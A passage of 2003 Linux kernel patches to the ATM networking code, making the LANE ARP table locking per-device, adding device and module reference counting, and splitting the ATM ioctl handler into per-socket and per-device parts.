*get_dev_lec(int itf) +{ + struct net_device *dev; + + if (itf >= MAX_LEC_ITF) + return NULL; + rtnl_lock(); + dev = dev_lec[itf]; + if (dev) + dev_hold(dev); + rtnl_unlock(); + return dev; } #if defined(CONFIG_BRIDGE) || defined(CONFIG_BRIDGE_MODULE) @@ -432,7 +441,7 @@ break; case l_narp_req: /* LANE2: see 7.1.35 in the lane2 spec */ entry = lec_arp_find(priv, mesg->content.normal.mac_addr); - lec_arp_remove(priv->lec_arp_tables, entry); + lec_arp_remove(priv, entry); if (mesg->content.normal.no_source_le_narp) break; @@ -833,37 +842,28 @@ return i; } -void atm_lane_init_ops(struct atm_lane_ops *ops) +static struct atm_lane_ops __atm_lane_ops = { - ops->lecd_attach = lecd_attach; - ops->mcast_attach = lec_mcast_attach; - ops->vcc_attach = lec_vcc_attach; - ops->get_lecs = get_dev_lec; - - printk("lec.c: " __DATE__ " " __TIME__ " initialized\n"); - - return; -} + .lecd_attach = lecd_attach, + .mcast_attach = lec_mcast_attach, + .vcc_attach = lec_vcc_attach, + .get_lec = get_dev_lec, + .owner = THIS_MODULE +}; static int __init lane_module_init(void) { - extern struct atm_lane_ops atm_lane_ops; - - atm_lane_init_ops(&atm_lane_ops); - + atm_lane_ops_set(&__atm_lane_ops); + printk("lec.c: " __DATE__ " " __TIME__ " initialized\n"); return 0; } static void __exit lane_module_cleanup(void) { int i; - extern struct atm_lane_ops atm_lane_ops; struct lec_priv *priv; - atm_lane_ops.lecd_attach = NULL; - atm_lane_ops.mcast_attach = NULL; - atm_lane_ops.vcc_attach = NULL; - atm_lane_ops.get_lecs = NULL; + atm_lane_ops_set(NULL); for (i = 0; i < MAX_LEC_ITF; i++) { if (dev_lec[i] != NULL) { @@ -873,7 +873,7 @@ unregister_trdev(dev_lec[i]); else #endif - unregister_netdev(dev_lec[i]); + unregister_netdev(dev_lec[i]); kfree(dev_lec[i]); dev_lec[i] = NULL; } @@ -1073,6 +1073,7 @@ for (i=0;ilec_arp_tables[i] = NULL; } + spin_lock_init(&priv->lec_arp_lock); init_timer(&priv->lec_arp_timer); priv->lec_arp_timer.expires = jiffies+LEC_ARP_REFRESH_INTERVAL; priv->lec_arp_timer.data = (unsigned long)priv; @@ -1109,21 +1110,20 @@ * Insert entry to lec_arp_table * LANE2: Add to the end of the list to satisfy 8.1.13 */ -static __inline__ void -lec_arp_add(struct lec_arp_table **lec_arp_tables, - struct lec_arp_table *to_add) +static inline void +lec_arp_add(struct lec_priv *priv, struct lec_arp_table *to_add) { unsigned long flags; unsigned short place; struct lec_arp_table *tmp; - spin_lock_irqsave(&lec_arp_spinlock, flags); + spin_lock_irqsave(&priv->lec_arp_lock, flags); place = HASH(to_add->mac_addr[ETH_ALEN-1]); - tmp = lec_arp_tables[place]; + tmp = priv->lec_arp_tables[place]; to_add->next = NULL; if (tmp == NULL) - lec_arp_tables[place] = to_add; + priv->lec_arp_tables[place] = to_add; else { /* add to the end */ while (tmp->next) @@ -1131,7 +1131,7 @@ tmp->next = to_add; } - spin_unlock_irqrestore(&lec_arp_spinlock, flags); + spin_unlock_irqrestore(&priv->lec_arp_lock, flags); DPRINTK("LEC_ARP: Added entry:%2.2x %2.2x %2.2x %2.2x %2.2x %2.2x\n", 0xff&to_add->mac_addr[0], 0xff&to_add->mac_addr[1], @@ -1142,8 +1142,8 @@ /* * Remove entry from lec_arp_table */ -static __inline__ int -lec_arp_remove(struct lec_arp_table **lec_arp_tables, +static inline int +lec_arp_remove(struct lec_priv *priv, struct lec_arp_table *to_remove) { unsigned long flags; @@ -1151,22 +1151,22 @@ struct lec_arp_table *tmp; int remove_vcc=1; - spin_lock_irqsave(&lec_arp_spinlock, flags); + spin_lock_irqsave(&priv->lec_arp_lock, flags); if (!to_remove) { - spin_unlock_irqrestore(&lec_arp_spinlock, flags); + spin_unlock_irqrestore(&priv->lec_arp_lock, flags); return -1; } place = HASH(to_remove->mac_addr[ETH_ALEN-1]); - tmp = lec_arp_tables[place]; + tmp = priv->lec_arp_tables[place]; if (tmp == to_remove) { - lec_arp_tables[place] = tmp->next; + priv->lec_arp_tables[place] = tmp->next; } else { while(tmp && tmp->next != to_remove) { tmp = tmp->next; } if (!tmp) {/* Entry was not found */ - spin_unlock_irqrestore(&lec_arp_spinlock, flags); + spin_unlock_irqrestore(&priv->lec_arp_lock, flags); return -1; } } @@ -1180,7 +1180,7 @@ * ESI_FLUSH_PENDING, ESI_FORWARD_DIRECT */ for(place=0;placenext){ + for(tmp = priv->lec_arp_tables[place]; tmp != NULL; tmp = tmp->next) { if (memcmp(tmp->atm_addr, to_remove->atm_addr, ATM_ESA_LEN)==0) { remove_vcc=0; @@ -1193,7 +1193,7 @@ } skb_queue_purge(&to_remove->tx_wait); /* FIXME: good place for this? */ - spin_unlock_irqrestore(&lec_arp_spinlock, flags); + spin_unlock_irqrestore(&priv->lec_arp_lock, flags); DPRINTK("LEC_ARP: Removed entry:%2.2x %2.2x %2.2x %2.2x %2.2x %2.2x\n", 0xff&to_remove->mac_addr[0], 0xff&to_remove->mac_addr[1], @@ -1389,7 +1389,7 @@ for (i=0;ilec_arp_tables[i];entry != NULL; entry=next) { next = entry->next; - lec_arp_remove(priv->lec_arp_tables, entry); + lec_arp_remove(priv, entry); kfree(entry); } } @@ -1429,7 +1429,7 @@ /* * Find entry by mac_address */ -static __inline__ struct lec_arp_table* +static inline struct lec_arp_table* lec_arp_find(struct lec_priv *priv, unsigned char *mac_addr) { @@ -1567,8 +1567,6 @@ lec_arp_check_expire(unsigned long data) { struct lec_priv *priv = (struct lec_priv *)data; - struct lec_arp_table **lec_arp_tables = - (struct lec_arp_table **)priv->lec_arp_tables; struct lec_arp_table *entry, *next; unsigned long now; unsigned long time_to_check; @@ -1584,7 +1582,7 @@ lec_arp_get(priv); now = jiffies; for(i=0;ilec_arp_tables[i]; entry != NULL; ) { if ((entry->flags) & LEC_REMOTE_FLAG && priv->topology_change) time_to_check=priv->forward_delay_time; @@ -1600,7 +1598,7 @@ /* Remove entry */ DPRINTK("LEC:Entry timed out\n"); next = entry->next; - lec_arp_remove(lec_arp_tables, entry); + lec_arp_remove(priv, entry); kfree(entry); entry = next; } else { @@ -1689,7 +1687,7 @@ if (!entry) { return priv->mcast_vcc; } - lec_arp_add(priv->lec_arp_tables, entry); + lec_arp_add(priv, entry); /* We want arp-request(s) to be sent */ entry->packets_flooded =1; entry->status = ESI_ARP_PENDING; @@ -1722,7 +1720,7 @@ if (!memcmp(atm_addr, entry->atm_addr, ATM_ESA_LEN) && (permanent || !(entry->flags & LEC_PERMANENT_FLAG))) { - lec_arp_remove(priv->lec_arp_tables, entry); + lec_arp_remove(priv, entry); kfree(entry); } lec_arp_put(priv); @@ -1788,7 +1786,7 @@ entry->status = ESI_FORWARD_DIRECT; memcpy(entry->mac_addr, mac_addr, ETH_ALEN); entry->last_used = jiffies; - lec_arp_add(priv->lec_arp_tables, entry); + lec_arp_add(priv, entry); } if (remoteflag) entry->flags|=LEC_REMOTE_FLAG; @@ -1808,7 +1806,7 @@ return; } entry->status = ESI_UNKNOWN; - lec_arp_add(priv->lec_arp_tables, entry); + lec_arp_add(priv, entry); /* Temporary, changes before end of function */ } memcpy(entry->atm_addr, atm_addr, ATM_ESA_LEN); @@ -2055,7 +2053,7 @@ to_add->old_push = vcc->push; vcc->push = lec_push; priv->mcast_vcc = vcc; - lec_arp_add(priv->lec_arp_tables, to_add); + lec_arp_add(priv, to_add); lec_arp_put(priv); return 0; } @@ -2073,7 +2071,7 @@ for(entry = priv->lec_arp_tables[i];entry; entry=next) { next = entry->next; if (vcc == entry->vcc) { - lec_arp_remove(priv->lec_arp_tables,entry); + lec_arp_remove(priv, entry); kfree(entry); if (priv->mcast_vcc == vcc) { priv->mcast_vcc = NULL; @@ -2153,23 +2151,23 @@ lec_arp_get(priv); entry = priv->lec_arp_empty_ones; if (vcc == entry->vcc) { - spin_lock_irqsave(&lec_arp_spinlock, flags); + spin_lock_irqsave(&priv->lec_arp_lock, flags); del_timer(&entry->timer); memcpy(entry->mac_addr, src, ETH_ALEN); entry->status = ESI_FORWARD_DIRECT; entry->last_used = jiffies; priv->lec_arp_empty_ones = entry->next; - spin_unlock_irqrestore(&lec_arp_spinlock, flags); + spin_unlock_irqrestore(&priv->lec_arp_lock, flags); /* We might have got an entry */ if ((prev=lec_arp_find(priv,src))) { - lec_arp_remove(priv->lec_arp_tables, prev); + lec_arp_remove(priv, prev); kfree(prev); } - lec_arp_add(priv->lec_arp_tables, entry); + lec_arp_add(priv, entry); lec_arp_put(priv); return; } - spin_lock_irqsave(&lec_arp_spinlock, flags); + spin_lock_irqsave(&priv->lec_arp_lock, flags); prev = entry; entry = entry->next; while (entry && entry->vcc != vcc) { @@ -2179,7 +2177,7 @@ if (!entry) { DPRINTK("LEC_ARP: Arp_check_empties: entry not found!\n"); lec_arp_put(priv); - spin_unlock_irqrestore(&lec_arp_spinlock, flags); + spin_unlock_irqrestore(&priv->lec_arp_lock, flags); return; } del_timer(&entry->timer); @@ -2187,12 +2185,12 @@ entry->status = ESI_FORWARD_DIRECT; entry->last_used = jiffies; prev->next = entry->next; - spin_unlock_irqrestore(&lec_arp_spinlock, flags); + spin_unlock_irqrestore(&priv->lec_arp_lock, flags); if ((prev = lec_arp_find(priv, src))) { - lec_arp_remove(priv->lec_arp_tables,prev); + lec_arp_remove(priv, prev); kfree(prev); } - lec_arp_add(priv->lec_arp_tables,entry); + lec_arp_add(priv, entry); lec_arp_put(priv); } MODULE_LICENSE("GPL"); diff -Nru a/net/atm/lec.h b/net/atm/lec.h --- a/net/atm/lec.h Mon Jun 30 13:21:44 2003 +++ b/net/atm/lec.h Mon Jun 30 13:21:44 2003 @@ -64,7 +64,8 @@ int (*lecd_attach)(struct atm_vcc *vcc, int arg); int (*mcast_attach)(struct atm_vcc *vcc, int arg); int (*vcc_attach)(struct atm_vcc *vcc, void *arg); - struct net_device **(*get_lecs)(void); + struct net_device * (*get_lec)(int itf); + struct module *owner; }; /* @@ -101,7 +102,8 @@ establishes multiple Multicast Forward VCCs to us. This list collects all those VCCs. LANEv1 client has only one item in this list. These entries are not aged out. */ atomic_t lec_arp_users; + spinlock_t lec_arp_lock; struct atm_vcc *mcast_vcc; /* Default Multicast Send VCC */ struct atm_vcc *lecd; struct timer_list lec_arp_timer; @@ -148,14 +150,16 @@ int lecd_attach(struct atm_vcc *vcc, int arg); int lec_vcc_attach(struct atm_vcc *vcc, void *arg); int lec_mcast_attach(struct atm_vcc *vcc, int arg); -struct net_device **get_dev_lec(void); +struct net_device *get_dev_lec(int itf); int make_lec(struct atm_vcc *vcc); int send_to_lecd(struct lec_priv *priv, atmlec_msg_type type, unsigned char *mac_addr, unsigned char *atm_addr, struct sk_buff *data); void lec_push(struct atm_vcc *vcc, struct sk_buff *skb); -void atm_lane_init(void); -void atm_lane_init_ops(struct atm_lane_ops *ops); +extern struct atm_lane_ops *atm_lane_ops; +void atm_lane_ops_set(struct atm_lane_ops *hook); +int try_atm_lane_ops(void); + #endif /* _LEC_H_ */ diff -Nru a/net/atm/mpc.c b/net/atm/mpc.c --- a/net/atm/mpc.c Mon Jun 30 13:21:44 2003 +++ b/net/atm/mpc.c Mon Jun 30 13:21:44 2003 @@ -251,12 +251,13 @@ static struct net_device *find_lec_by_itfnum(int itf) { - extern struct atm_lane_ops atm_lane_ops; /* in common.c */ - - if (atm_lane_ops.get_lecs == NULL) + struct net_device *dev; + if (!try_atm_lane_ops()) return NULL; - return atm_lane_ops.get_lecs()[itf]; /* FIXME: something better */ + dev = atm_lane_ops->get_lec(itf); + __MOD_DEC_USE_COUNT(atm_lane_ops->owner); + return dev; } static struct mpoa_client *alloc_mpc(void) @@ -777,9 +778,10 @@ if (mpc->dev) { /* check if the lec is LANE2 capable */ priv = (struct lec_priv *)mpc->dev->priv; - if (priv->lane_version < 2) + if (priv->lane_version < 2) { + dev_put(mpc->dev); mpc->dev = NULL; - else + } else priv->lane2_ops->associate_indicator = lane2_assoc_ind; } @@ -837,6 +839,7 @@ struct lec_priv *priv = (struct lec_priv *)mpc->dev->priv; priv->lane2_ops->associate_indicator = NULL; stop_mpc(mpc); + dev_put(mpc->dev); } mpc->in_ops->destroy_cache(mpc); @@ -973,6 +976,7 @@ } mpc->dev_num = priv->itfnum; mpc->dev = dev; + dev_hold(dev); dprintk("mpoa: (%s) was initialized\n", dev->name); break; case NETDEV_UNREGISTER: @@ -982,6 +986,7 @@ break; dprintk("mpoa: device (%s) was deallocated\n", dev->name); stop_mpc(mpc); + dev_put(mpc->dev); mpc->dev = NULL; break; case NETDEV_UP: @@ -1391,13 +1396,18 @@ return; } -void atm_mpoa_init_ops(struct atm_mpoa_ops *ops) +static struct atm_mpoa_ops __atm_mpoa_ops = { + .mpoad_attach = atm_mpoa_mpoad_attach, + .vcc_attach = atm_mpoa_vcc_attach, + .owner = THIS_MODULE +}; + +static __init int atm_mpoa_init(void) { - ops->mpoad_attach = atm_mpoa_mpoad_attach; - ops->vcc_attach = atm_mpoa_vcc_attach; + atm_mpoa_ops_set(&__atm_mpoa_ops); #ifdef CONFIG_PROC_FS - if(mpc_proc_init() != 0) + if (mpc_proc_init() != 0) printk(KERN_INFO "mpoa: failed to initialize /proc/mpoa\n"); else printk(KERN_INFO "mpoa: /proc/mpoa initialized\n"); @@ -1405,22 +1415,11 @@ printk("mpc.c: " __DATE__ " " __TIME__ " initialized\n"); - return; -} - -#ifdef MODULE -int init_module(void) -{ - extern struct atm_mpoa_ops atm_mpoa_ops; - - atm_mpoa_init_ops(&atm_mpoa_ops); - return 0; } -void cleanup_module(void) +void __exit atm_mpoa_cleanup(void) { - extern struct atm_mpoa_ops atm_mpoa_ops; struct mpoa_client *mpc, *tmp; struct atm_mpoa_qos *qos, *nextqos; struct lec_priv *priv; @@ -1435,8 +1434,7 @@ del_timer(&mpc_timer); unregister_netdevice_notifier(&mpoa_notifier); - atm_mpoa_ops.mpoad_attach = NULL; - atm_mpoa_ops.vcc_attach = NULL; + atm_mpoa_ops_set(NULL); mpc = mpcs; mpcs = NULL; @@ -1471,5 +1469,8 @@ return; } -#endif /* MODULE */ + +module_init(atm_mpoa_init); +module_exit(atm_mpoa_cleanup); + MODULE_LICENSE("GPL"); diff -Nru a/net/atm/mpc.h b/net/atm/mpc.h --- a/net/atm/mpc.h Mon Jun 30 13:21:44 2003 +++ b/net/atm/mpc.h Mon Jun 30 13:21:44 2003 @@ -48,11 +48,13 @@ struct atm_mpoa_ops { int (*mpoad_attach)(struct atm_vcc *vcc, int arg); /* attach mpoa daemon */ int (*vcc_attach)(struct atm_vcc *vcc, long arg); /* attach shortcut vcc */ + struct module *owner; }; /* Boot/module initialization function */ -void atm_mpoa_init(void); -void atm_mpoa_init_ops(struct atm_mpoa_ops *ops); +extern struct atm_mpoa_ops *atm_mpoa_ops; +int try_atm_mpoa_ops(void); +void atm_mpoa_ops_set(struct atm_mpoa_ops *hook); /* MPOA QoS operations */ struct atm_mpoa_qos *atm_mpoa_add_qos(uint32_t dst_ip, struct atm_qos *qos); diff -Nru a/net/atm/proc.c b/net/atm/proc.c --- a/net/atm/proc.c Mon Jun 30 13:21:44 2003 +++ b/net/atm/proc.c Mon Jun 30 13:21:44 2003 @@ -47,7 +47,6 @@ #if defined(CONFIG_ATM_LANE) || defined(CONFIG_ATM_LANE_MODULE) #include "lec.h" #include "lec_arpc.h" -extern struct atm_lane_ops atm_lane_ops; /* in common.c */ #endif static ssize_t proc_dev_atm_read(struct file *file,char *buf,size_t count, @@ -479,57 +478,72 @@ #if defined(CONFIG_ATM_LANE) || defined(CONFIG_ATM_LANE_MODULE) static int atm_lec_info(loff_t pos,char *buf) { + unsigned long flags; struct lec_priv *priv; struct lec_arp_table *entry; int i, count, d, e; - struct net_device **dev_lec; + struct net_device *dev; if (!pos) { return sprintf(buf,"Itf MAC ATM destination" " Status Flags " "VPI/VCI Recv VPI/VCI\n"); } - if (atm_lane_ops.get_lecs == NULL) + if (!try_atm_lane_ops()) return 0; /* the lane module is not there yet */ - else - dev_lec = atm_lane_ops.get_lecs(); count = pos; - for(d=0;dpriv)) continue; - for(i=0;ilec_arp_tables[i]; - for(;entry;entry=entry->next) { - if (--count) continue; - e=sprintf(buf,"%s ", - dev_lec[d]->name); - lec_info(entry,buf+e); + for(d = 0; d < MAX_LEC_ITF; d++) { + dev = atm_lane_ops->get_lec(d); + if (!dev || !(priv = (struct lec_priv *) dev->priv)) + continue; + spin_lock_irqsave(&priv->lec_arp_lock, flags); + for(i = 0; i < LEC_ARP_TABLE_SIZE; i++) { + for(entry = priv->lec_arp_tables[i]; entry; entry = entry->next) { + if (--count) + continue; + e = sprintf(buf,"%s ", dev->name); + lec_info(entry, buf+e); + spin_unlock_irqrestore(&priv->lec_arp_lock, flags); + dev_put(dev); + __MOD_DEC_USE_COUNT(atm_lane_ops->owner); return strlen(buf); } } - for(entry=priv->lec_arp_empty_ones; entry; - entry=entry->next) { - if (--count) continue; - e=sprintf(buf,"%s ",dev_lec[d]->name); + for(entry = priv->lec_arp_empty_ones; entry; entry = entry->next) { + if (--count) + continue; + e = sprintf(buf,"%s ", dev->name); lec_info(entry, buf+e); + spin_unlock_irqrestore(&priv->lec_arp_lock, flags); + dev_put(dev); + __MOD_DEC_USE_COUNT(atm_lane_ops->owner); return strlen(buf); } - for(entry=priv->lec_no_forward; entry; - entry=entry->next) { - if (--count) continue; - e=sprintf(buf,"%s ",dev_lec[d]->name); + for(entry = priv->lec_no_forward; entry; entry=entry->next) { + if (--count) + continue; + e = sprintf(buf,"%s ", dev->name); lec_info(entry, buf+e); + spin_unlock_irqrestore(&priv->lec_arp_lock, flags); + dev_put(dev); + __MOD_DEC_USE_COUNT(atm_lane_ops->owner); return strlen(buf); } - for(entry=priv->mcast_fwds; entry; - entry=entry->next) { - if (--count) continue; - e=sprintf(buf,"%s ",dev_lec[d]->name); + for(entry = priv->mcast_fwds; entry; entry = entry->next) { + if (--count) + continue; + e = sprintf(buf,"%s ", dev->name); lec_info(entry, buf+e); + spin_unlock_irqrestore(&priv->lec_arp_lock, flags); + dev_put(dev); + __MOD_DEC_USE_COUNT(atm_lane_ops->owner); return strlen(buf); } + spin_unlock_irqrestore(&priv->lec_arp_lock, flags); + dev_put(dev); } + __MOD_DEC_USE_COUNT(atm_lane_ops->owner); return 0; } #endif [atm]: split atm_ioctl into vcc_ioctl and atm_dev_ioctl # This is a BitKeeper generated patch for the following project: # Project Name: Linux kernel tree # This patch format is intended for GNU patch command version 2.5 or higher. # This patch includes the following deltas: # ChangeSet 1.1016 -> 1.1017 # net/atm/pvc.c 1.4 -> 1.5 # net/atm/resources.c 1.6 -> 1.7 # net/atm/svc.c 1.4 -> 1.5 # net/atm/common.h 1.2 -> 1.3 # net/atm/resources.h 1.3 -> 1.4 # net/atm/common.c 1.18 -> 1.19 # # The following is the BitKeeper ChangeSet Log # -------------------------------------------- # 03/06/27 davem@nuts.ninka.net 1.1011.1.19 # [NET]: net/bluetooth/cmtp/core.c needs linux/init.h # -------------------------------------------- # 03/06/27 davem@nuts.ninka.net 1.1011.1.20 # [NET]: Scale DST/ipv6 intervals like we did for ipv4. # -------------------------------------------- # 03/06/28 chas@relax.cmf.nrl.navy.mil 1.1017 # svc.c, resources.h, resources.c, pvc.c, common.h, common.c: # split atm_ioctl into vcc_ioctl and atm_dev_ioctl # -------------------------------------------- # diff -Nru a/net/atm/common.c b/net/atm/common.c --- a/net/atm/common.c Mon Jun 30 13:21:27 2003 +++ b/net/atm/common.c Mon Jun 30 13:21:27 2003 @@ -564,129 +564,51 @@ } -static void copy_aal_stats(struct k_atm_aal_stats *from, - struct atm_aal_stats *to) +int vcc_ioctl(struct socket *sock, unsigned int cmd, unsigned long arg) { -#define __HANDLE_ITEM(i) to->i = atomic_read(&from->i) - __AAL_STAT_ITEMS -#undef __HANDLE_ITEM -} - - -static void subtract_aal_stats(struct k_atm_aal_stats *from, - struct atm_aal_stats *to) -{ -#define __HANDLE_ITEM(i) atomic_sub(to->i,&from->i) - __AAL_STAT_ITEMS -#undef __HANDLE_ITEM -} - - -static int fetch_stats(struct atm_dev *dev,struct atm_dev_stats *arg,int zero) -{ - struct atm_dev_stats tmp; - int error = 0; - - copy_aal_stats(&dev->stats.aal0,&tmp.aal0); - copy_aal_stats(&dev->stats.aal34,&tmp.aal34); - copy_aal_stats(&dev->stats.aal5,&tmp.aal5); - if (arg) error = copy_to_user(arg,&tmp,sizeof(tmp)); - if (zero && !error) { - subtract_aal_stats(&dev->stats.aal0,&tmp.aal0); - subtract_aal_stats(&dev->stats.aal34,&tmp.aal34); - subtract_aal_stats(&dev->stats.aal5,&tmp.aal5); - } - return error ? -EFAULT : 0; -} - - -int atm_ioctl(struct socket *sock,unsigned int cmd,unsigned long arg) -{ - struct atm_dev *dev; - struct list_head *p; struct atm_vcc *vcc; - int *tmp_buf, *tmp_p; - void *buf; - int error,len,size,number, ret_val; + int error; - ret_val = 0; vcc = ATM_SD(sock); switch (cmd) { case SIOCOUTQ: if (sock->state != SS_CONNECTED || - !test_bit(ATM_VF_READY,&vcc->flags)) { - ret_val = -EINVAL; + !test_bit(ATM_VF_READY, &vcc->flags)) { + error = -EINVAL; goto done; } - ret_val = put_user(vcc->sk->sndbuf- - atomic_read(&vcc->sk->wmem_alloc), - (int *) arg) ? -EFAULT : 0; + error = put_user(vcc->sk->sndbuf- + atomic_read(&vcc->sk->wmem_alloc), + (int *) arg) ? -EFAULT : 0; goto done; case SIOCINQ: { struct sk_buff *skb; if (sock->state != SS_CONNECTED) { - ret_val = -EINVAL; + error = -EINVAL; goto done; } skb = skb_peek(&vcc->sk->receive_queue); - ret_val = put_user(skb ? skb->len : 0,(int *) arg) - ? -EFAULT : 0; - goto done; - } - case ATM_GETNAMES: - if (get_user(buf, - &((struct atm_iobuf *) arg)->buffer)) { - ret_val = -EFAULT; - goto done; - } - if (get_user(len, - &((struct atm_iobuf *) arg)->length)) { - ret_val = -EFAULT; + error = put_user(skb ? skb->len : 0, + (int *) arg) ? -EFAULT : 0; goto done; } - size = 0; - spin_lock(&atm_dev_lock); - list_for_each(p, &atm_devs) - size += sizeof(int); - if (size > len) { - spin_unlock(&atm_dev_lock); - ret_val = -E2BIG; - goto done; - } - tmp_buf = kmalloc(size, GFP_ATOMIC); - if (!tmp_buf) { - spin_unlock(&atm_dev_lock); - ret_val = -ENOMEM; - goto done; - } - tmp_p = tmp_buf; - list_for_each(p, &atm_devs) { - dev = list_entry(p, struct atm_dev, dev_list); - *tmp_p++ = dev->number; - } - spin_unlock(&atm_dev_lock); - ret_val = ((copy_to_user(buf, tmp_buf, size)) || - put_user(size, &((struct atm_iobuf *) arg)->length) - ) ? -EFAULT : 0; - kfree(tmp_buf); - goto done; case SIOCGSTAMP: /* borrowed from IP */ if (!vcc->sk->stamp.tv_sec) { - ret_val = -ENOENT; + error = -ENOENT; goto done; } - ret_val = copy_to_user((void *) arg, &vcc->sk->stamp, - sizeof(struct timeval)) ? -EFAULT : 0; + error = copy_to_user((void *) arg, &vcc->sk->stamp, + sizeof(struct timeval)) ? -EFAULT : 0; goto done; case ATM_SETSC: printk(KERN_WARNING "ATM_SETSC is obsolete\n"); - ret_val = 0; + error = 0; goto done; case ATMSIGD_CTRL: if (!capable(CAP_NET_ADMIN)) { - ret_val = -EPERM; + error = -EPERM; goto done; } /* @@ -697,28 +619,28 @@ * have the same privledges that /proc/kcore needs */ if (!capable(CAP_SYS_RAWIO)) { - ret_val = -EPERM; + error = -EPERM; goto done; } error = sigd_attach(vcc); - if (!error) sock->state = SS_CONNECTED; - ret_val = error; + if (!error) + sock->state = SS_CONNECTED; goto done; #if defined(CONFIG_ATM_CLIP) || defined(CONFIG_ATM_CLIP_MODULE) case SIOCMKCLIP: if (!capable(CAP_NET_ADMIN)) { - ret_val = -EPERM; + error = -EPERM; goto done; } if (try_atm_clip_ops()) { - ret_val = atm_clip_ops->clip_create(arg); + error = atm_clip_ops->clip_create(arg); __MOD_DEC_USE_COUNT(atm_clip_ops->owner); } else - ret_val = -ENOSYS; + error = -ENOSYS; goto done; case ATMARPD_CTRL: if (!capable(CAP_NET_ADMIN)) { - ret_val = -EPERM; + error = -EPERM; goto done; } #if defined(CONFIG_ATM_CLIP_MODULE) @@ -730,48 +652,47 @@ __MOD_DEC_USE_COUNT(atm_clip_ops->owner); if (!error) sock->state = SS_CONNECTED; - ret_val = error; } else - ret_val = -ENOSYS; + error = -ENOSYS; goto done; case ATMARP_MKIP: if (!capable(CAP_NET_ADMIN)) { - ret_val = -EPERM; + error = -EPERM; goto done; } if (try_atm_clip_ops()) { - ret_val = atm_clip_ops->clip_mkip(vcc, arg); + error = atm_clip_ops->clip_mkip(vcc, arg); __MOD_DEC_USE_COUNT(atm_clip_ops->owner); } else - ret_val = -ENOSYS; + error = -ENOSYS; goto done; case ATMARP_SETENTRY: if (!capable(CAP_NET_ADMIN)) { - ret_val = -EPERM; + error = -EPERM; goto done; } if (try_atm_clip_ops()) { - ret_val = atm_clip_ops->clip_setentry(vcc, arg); + error = atm_clip_ops->clip_setentry(vcc, arg); __MOD_DEC_USE_COUNT(atm_clip_ops->owner); } else - ret_val = -ENOSYS; + error = -ENOSYS; goto done; case ATMARP_ENCAP: if (!capable(CAP_NET_ADMIN)) { - ret_val = -EPERM; + error = -EPERM; goto done; } if (try_atm_clip_ops()) { - ret_val = atm_clip_ops->clip_encap(vcc, arg); + error = atm_clip_ops->clip_encap(vcc, arg); __MOD_DEC_USE_COUNT(atm_clip_ops->owner); } else - ret_val = -ENOSYS; + error = -ENOSYS; goto done; #endif #if defined(CONFIG_ATM_LANE) || defined(CONFIG_ATM_LANE_MODULE) case ATMLEC_CTRL: if (!capable(CAP_NET_ADMIN)) { - ret_val = -EPERM; + error = -EPERM; goto done; } #if defined(CONFIG_ATM_LANE_MODULE) @@ -783,37 +704,36 @@ __MOD_DEC_USE_COUNT(atm_lane_ops->owner); if (error >= 0) sock->state = SS_CONNECTED; - ret_val = error; } else - ret_val = -ENOSYS; + error = -ENOSYS; goto done; case ATMLEC_MCAST: if (!capable(CAP_NET_ADMIN)) { - ret_val = -EPERM; + error = -EPERM; goto done; } if (try_atm_lane_ops()) { - ret_val = atm_lane_ops->mcast_attach(vcc, (int) arg); + error = atm_lane_ops->mcast_attach(vcc, (int) arg); __MOD_DEC_USE_COUNT(atm_lane_ops->owner); } else - ret_val = -ENOSYS; + error = -ENOSYS; goto done; case ATMLEC_DATA: if (!capable(CAP_NET_ADMIN)) { - ret_val = -EPERM; + error = -EPERM; goto done; } if (try_atm_lane_ops()) { - ret_val = atm_lane_ops->vcc_attach(vcc, (void *) arg); + error = atm_lane_ops->vcc_attach(vcc, (void *) arg); __MOD_DEC_USE_COUNT(atm_lane_ops->owner); } else - ret_val = -ENOSYS; + error = -ENOSYS; goto done; #endif #if defined(CONFIG_ATM_MPOA) || defined(CONFIG_ATM_MPOA_MODULE) case ATMMPC_CTRL: if (!capable(CAP_NET_ADMIN)) { - ret_val = -EPERM; + error = -EPERM; goto done; } #if defined(CONFIG_ATM_MPOA_MODULE) @@ -825,63 +745,62 @@ __MOD_DEC_USE_COUNT(atm_mpoa_ops->owner); if (error >= 0) sock->state = SS_CONNECTED; - ret_val = error; } else - ret_val = -ENOSYS; + error = -ENOSYS; goto done; case ATMMPC_DATA: if (!capable(CAP_NET_ADMIN)) { - ret_val = -EPERM; + error = -EPERM; goto done; } if (try_atm_mpoa_ops()) { - ret_val = atm_mpoa_ops->vcc_attach(vcc, arg); + error = atm_mpoa_ops->vcc_attach(vcc, arg); __MOD_DEC_USE_COUNT(atm_mpoa_ops->owner); } else - ret_val = -ENOSYS; + error = -ENOSYS; goto done; #endif #if defined(CONFIG_ATM_TCP) || defined(CONFIG_ATM_TCP_MODULE) case SIOCSIFATMTCP: if (!capable(CAP_NET_ADMIN)) { - ret_val = -EPERM; + error = -EPERM; goto done; } if (!atm_tcp_ops.attach) { - ret_val = -ENOPKG; + error = -ENOPKG; goto done; } - fops_get (&atm_tcp_ops); - error = atm_tcp_ops.attach(vcc,(int) arg); - if (error >= 0) sock->state = SS_CONNECTED; - else fops_put (&atm_tcp_ops); - ret_val = error; + fops_get(&atm_tcp_ops); + error = atm_tcp_ops.attach(vcc, (int) arg); + if (error >= 0) + sock->state = SS_CONNECTED; + else + fops_put (&atm_tcp_ops); goto done; case ATMTCP_CREATE: if (!capable(CAP_NET_ADMIN)) { - ret_val = -EPERM; + error = -EPERM; goto done; } if (!atm_tcp_ops.create_persistent) { - ret_val = -ENOPKG; + error = -ENOPKG; goto done; } error = atm_tcp_ops.create_persistent((int) arg); - if (error < 0) fops_put (&atm_tcp_ops); - ret_val = error; + if (error < 0) + fops_put(&atm_tcp_ops); goto done; case ATMTCP_REMOVE: if (!capable(CAP_NET_ADMIN)) { - ret_val = -EPERM; + error = -EPERM; goto done; } if (!atm_tcp_ops.remove_persistent) { - ret_val = -ENOPKG; + error = -ENOPKG; goto done; } error = atm_tcp_ops.remove_persistent((int) arg); - fops_put (&atm_tcp_ops); - ret_val = error; + fops_put(&atm_tcp_ops); goto done; #endif default: @@ -889,183 +808,23 @@ } #if defined(CONFIG_PPPOATM) || defined(CONFIG_PPPOATM_MODULE) if (pppoatm_ioctl_hook) { - ret_val = pppoatm_ioctl_hook(vcc, cmd, arg); - if (ret_val != -ENOIOCTLCMD) + error = pppoatm_ioctl_hook(vcc, cmd, arg); + if (error != -ENOIOCTLCMD) goto done; } #endif #if defined(CONFIG_ATM_BR2684) || defined(CONFIG_ATM_BR2684_MODULE) if (br2684_ioctl_hook) { - ret_val = br2684_ioctl_hook(vcc, cmd, arg); - if (ret_val != 